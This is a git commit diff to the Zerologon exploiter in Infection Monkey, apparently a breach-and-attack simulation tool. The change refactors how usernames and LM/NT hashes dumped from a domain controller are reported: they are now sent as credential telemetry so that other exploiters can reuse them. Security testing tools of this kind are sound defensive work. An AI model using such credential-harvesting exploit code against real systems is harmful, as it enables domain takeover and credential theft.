Agent: Send extracted creds as CredentialTelemetry from Zerologon exploiter

2022-03-07 15:01:38 +05:30 · 2022-03-07 15:01:38 +05:30 · 040227286a
parent aee3566a0c
commit 040227286a
1 changed files with 9 additions and 14 deletions
--- a/monkey/infection_monkey/exploit/zerologon.py
+++ b/monkey/infection_monkey/exploit/zerologon.py
@ -16,11 +16,14 @@ from impacket.dcerpc.v5 import epm, nrpc, rpcrt, transport
 from impacket.dcerpc.v5.dtypes import NULL

 from common.utils.exploit_enum import ExploitType
+from infection_monkey.credential_collectors import LMHash, NTHash, Username
 from infection_monkey.exploit.HostExploiter import HostExploiter
 from infection_monkey.exploit.zerologon_utils.dump_secrets import DumpSecrets
 from infection_monkey.exploit.zerologon_utils.options import OptionsForSecretsdump
 from infection_monkey.exploit.zerologon_utils.vuln_assessment import get_dc_details, is_exploitable
 from infection_monkey.exploit.zerologon_utils.wmiexec import Wmiexec
+from infection_monkey.i_puppet.credential_collection import Credentials
+from infection_monkey.telemetry.credentials_telem import CredentialsTelem
 from infection_monkey.utils.capture_output import StdoutCapture

 logger = logging.getLogger(__name__)
@ -36,7 +39,6 @@ class ZerologonExploiter(HostExploiter):

    def __init__(self, host: object):
        super().__init__(host)
-        self.exploit_info["credentials"] = {}
        self.exploit_info["password_restored"] = None
        self._extracted_creds = {}
        self._secrets_dir = tempfile.TemporaryDirectory(prefix="zerologon")
@ -264,7 +266,7 @@ class ZerologonExploiter(HostExploiter):

    def store_extracted_creds_for_exploitation(self) -> None:
        for user in self._extracted_creds.keys():
-            self.add_extracted_creds_to_exploit_info(
+            self.send_extracted_creds_as_credential_telemetry(
                user,
                self._extracted_creds[user]["lm_hash"],
                self._extracted_creds[user]["nt_hash"],
@ -275,18 +277,11 @@ class ZerologonExploiter(HostExploiter):
                self._extracted_creds[user]["nt_hash"],
            )

-    def add_extracted_creds_to_exploit_info(self, user: str, lmhash: str, nthash: str) -> None:
-        # TODO exploit_info["credentials"] is discontinued,
-        # refactor to send a credential telemetry
-        self.exploit_info["credentials"].update(
-            {
-                user: {
-                    "username": user,
-                    "password": "",
-                    "lm_hash": lmhash,
-                    "ntlm_hash": nthash,
-                }
-            }
+    def send_extracted_creds_as_credential_telemetry(
+        self, user: str, lmhash: str, nthash: str
+    ) -> None:
+        self._telemetry_messenger.send_telemetry(
+            CredentialsTelem([Credentials([Username(user)], [LMHash(lmhash), NTHash(nthash)])])
        )

    # so other exploiters can use these creds